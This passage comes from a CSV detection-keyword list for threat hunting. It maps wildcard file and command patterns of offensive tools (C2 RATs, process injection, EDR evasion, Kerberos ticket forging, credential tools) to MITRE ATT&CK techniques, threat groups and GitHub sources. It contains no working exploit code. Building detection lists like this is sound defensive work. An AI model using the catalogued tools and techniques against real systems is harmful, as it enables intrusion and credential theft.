APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*thisisateststringdontcatchme*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*ThisIsNotRat-main*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*thoth.py -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*thoth-master.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*Thread_Hiijack_Inject_Load.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*ThreadlessInject* -p * -d *","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject.exe*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject-master*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*threads all alertable*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*ThreadStackSpoofer*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*ThreatCheck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*ThreatCheck.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*ThreatCheck-master*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*threatexpress*","offensive_tool_keyword","Github Username","github repo hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/threatexpress","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*threatexpress*malleable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*threatexpress/cs2modrewrite*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*ThunderDNS*.php*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderDNS*.ps1*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderDNS*.py*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderDNS.git*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" +"*ThunderFox.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ThunderShell*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ThunderShell.git*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ThunderShell.py*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ThunderShell-master.zip*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*thycotic_secretserver_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*tiagorlampert*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/tiagorlampert","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ticket.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ticket.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*ticketConverter.py *.ccache *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*ticketConverter.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ticketer.py -nthash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ticketer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ticketsplease adfs *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*ticketsplease azure *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*ticketsplease dcsync *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*ticketsplease ldap *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*ticketsplease saml *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*ticketsplease ticket --domain*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*ticketsplease.modules.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*TicketToHashcat.py*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*TicketToHashcat.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Tiger-192.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*tijme/kernel-mii*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" +"*TikiLoader*Hollower*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiLoader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiLoader.*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*TikiLoader.dll*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and 